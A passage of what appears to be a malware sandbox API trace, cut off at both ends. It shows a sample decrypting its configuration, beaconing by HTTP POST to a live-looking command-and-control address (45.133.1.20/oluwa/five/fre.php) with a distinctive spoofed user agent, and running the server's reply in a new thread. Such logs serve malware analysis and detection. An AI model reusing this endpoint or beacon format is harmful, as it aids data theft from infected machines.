phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0243.079] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.080] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0243.081] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.081] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0243.081] GetProcessHeap () returned 0x6a0000 [0243.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0243.083] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.083] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0243.084] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.084] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0243.085] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.086] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0243.086] GetProcessHeap () returned 0x6a0000 [0243.086] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0243.091] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0243.091] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0243.092] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0243.092] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0243.093] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0243.093] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0243.094] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0243.095] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0243.095] GetProcessHeap () returned 0x6a0000 [0243.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0243.095] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0243.098] GetProcessHeap () returned 0x6a0000 [0243.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0243.098] GetProcessHeap () returned 0x6a0000 [0243.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0243.099] GetProcessHeap () returned 0x6a0000 [0243.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0243.099] GetProcessHeap () returned 0x6a0000 [0243.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0243.100] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.100] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0243.109] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.110] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0243.121] GetProcessHeap () returned 0x6a0000 [0243.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0243.122] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.122] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0243.123] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.123] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0243.124] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.125] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0243.125] GetProcessHeap () returned 0x6a0000 [0243.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0243.126] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.127] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0243.128] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.128] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0243.129] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.129] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0243.129] GetProcessHeap () returned 0x6a0000 [0243.129] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0243.130] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0243.131] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0243.131] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0243.132] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0243.133] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0243.133] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0243.134] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0243.134] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0243.134] GetProcessHeap () returned 0x6a0000 [0243.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0243.134] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0243.134] GetProcessHeap () returned 0x6a0000 [0243.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba990 [0243.135] socket (af=2, type=1, protocol=6) returned 0x7d0 [0243.135] connect (s=0x7d0, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0243.164] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0243.164] GetProcessHeap () returned 0x6a0000 [0243.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0243.164] GetProcessHeap () returned 0x6a0000 [0243.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6db728 [0243.165] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0243.166] wvsprintfA (in: param_1=0x6db728, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0243.166] GetProcessHeap () returned 0x6a0000 [0243.166] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c4df8 [0243.166] GetProcessHeap () returned 0x6a0000 [0243.167] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 [0243.167] GetProcessHeap () returned 0x6a0000 [0243.167] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0243.167] GetProcessHeap () returned 0x6a0000 [0243.167] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6db728 [0243.168] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0243.169] wvsprintfA (in: param_1=0x6db728, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0243.169] GetProcessHeap () returned 0x6a0000 [0243.169] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0243.169] GetProcessHeap () returned 0x6a0000 [0243.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 [0243.169] send (s=0x7d0, buf=0x6bd460*, len=242, flags=0) returned 242 [0243.170] send (s=0x7d0, buf=0x6bb998*, len=159, flags=0) returned 159 [0243.170] GetProcessHeap () returned 0x6a0000 [0243.170] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0243.170] recv (in: s=0x7d0, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0243.241] GetProcessHeap () returned 0x6a0000 [0243.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0243.242] GetProcessHeap () returned 0x6a0000 [0243.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0243.243] GetProcessHeap () returned 0x6a0000 [0243.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4df8 | out: hHeap=0x6a0000) returned 1 [0243.244] GetProcessHeap () returned 0x6a0000 [0243.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0243.244] closesocket (s=0x7d0) returned 0 [0243.245] GetProcessHeap () returned 0x6a0000 [0243.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba990 | out: hHeap=0x6a0000) returned 1 [0243.245] GetProcessHeap () returned 0x6a0000 [0243.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0243.246] GetProcessHeap () returned 0x6a0000 [0243.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0243.246] GetProcessHeap () returned 0x6a0000 [0243.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0243.246] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1504) returned 0x7d0 [0243.249] Sleep (dwMilliseconds=0xea60) [0243.250] GetProcessHeap () returned 0x6a0000 [0243.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0243.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.252] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0243.258] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.258] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0243.271] GetProcessHeap () returned 0x6a0000 [0243.271] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0243.275] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.275] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0243.276] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.276] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0243.277] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.278] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0243.278] GetProcessHeap () returned 0x6a0000 [0243.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0243.279] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.279] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0243.302] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.303] CryptDestroyKey (hKey=0x6ad020) returned 1 [0243.304] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.304] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0243.304] GetProcessHeap () returned 0x6a0000 [0243.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0243.305] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0243.305] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0243.307] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0243.307] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0243.308] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0243.308] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0243.309] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0243.310] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0243.310] GetProcessHeap () returned 0x6a0000 [0243.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0243.310] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0243.310] GetProcessHeap () returned 0x6a0000 [0243.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0243.311] GetProcessHeap () returned 0x6a0000 [0243.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0243.311] GetProcessHeap () returned 0x6a0000 [0243.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0243.311] GetProcessHeap () returned 0x6a0000 [0243.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0243.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.313] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0243.322] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.323] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0243.334] GetProcessHeap () returned 0x6a0000 [0243.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0243.336] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.336] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0243.338] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.338] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0243.340] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.340] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0243.340] GetProcessHeap () returned 0x6a0000 [0243.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0243.341] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.342] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0243.343] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.343] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0243.344] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.344] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0243.344] GetProcessHeap () returned 0x6a0000 [0243.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0243.345] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0243.346] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0243.346] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0243.347] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0243.348] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0243.348] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0243.349] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0243.350] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0243.350] GetProcessHeap () returned 0x6a0000 [0243.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0243.350] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0243.350] GetProcessHeap () returned 0x6a0000 [0243.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa80 [0243.350] socket (af=2, type=1, protocol=6) returned 0x7d4 [0243.353] connect (s=0x7d4, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0243.375] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0243.375] GetProcessHeap () returned 0x6a0000 [0243.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0243.375] GetProcessHeap () returned 0x6a0000 [0243.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6db728 [0243.376] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0243.377] wvsprintfA (in: param_1=0x6db728, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0243.377] GetProcessHeap () returned 0x6a0000 [0243.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c4d38 [0243.377] GetProcessHeap () returned 0x6a0000 [0243.377] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 [0243.378] GetProcessHeap () returned 0x6a0000 [0243.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0243.378] GetProcessHeap () returned 0x6a0000 [0243.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6db728 [0243.378] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0243.379] wvsprintfA (in: param_1=0x6db728, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0243.379] GetProcessHeap () returned 0x6a0000 [0243.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0243.379] GetProcessHeap () returned 0x6a0000 [0243.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 [0243.380] send (s=0x7d4, buf=0x6bd460*, len=242, flags=0) returned 242 [0243.380] send (s=0x7d4, buf=0x6bb998*, len=159, flags=0) returned 159 [0243.381] GetProcessHeap () returned 0x6a0000 [0243.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0243.381] recv (in: s=0x7d4, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0243.456] GetProcessHeap () returned 0x6a0000 [0243.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0243.457] GetProcessHeap () returned 0x6a0000 [0243.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0243.458] GetProcessHeap () returned 0x6a0000 [0243.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4d38 | out: hHeap=0x6a0000) returned 1 [0243.458] GetProcessHeap () returned 0x6a0000 [0243.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0243.459] closesocket (s=0x7d4) returned 0 [0243.459] GetProcessHeap () returned 0x6a0000 [0243.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa80 | out: hHeap=0x6a0000) returned 1 [0243.459] GetProcessHeap () returned 0x6a0000 [0243.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0243.460] GetProcessHeap () returned 0x6a0000 [0243.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0243.460] GetProcessHeap () returned 0x6a0000 [0243.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0243.460] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1508) returned 0x7d4 [0243.462] Sleep (dwMilliseconds=0xea60) [0243.468] GetProcessHeap () returned 0x6a0000 [0243.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0243.469] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.470] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0243.481] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.481] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0243.489] GetProcessHeap () returned 0x6a0000 [0243.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0243.490] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.490] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0243.491] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.491] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0243.492] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.493] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0243.493] GetProcessHeap () returned 0x6a0000 [0243.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0243.494] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.495] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0243.496] 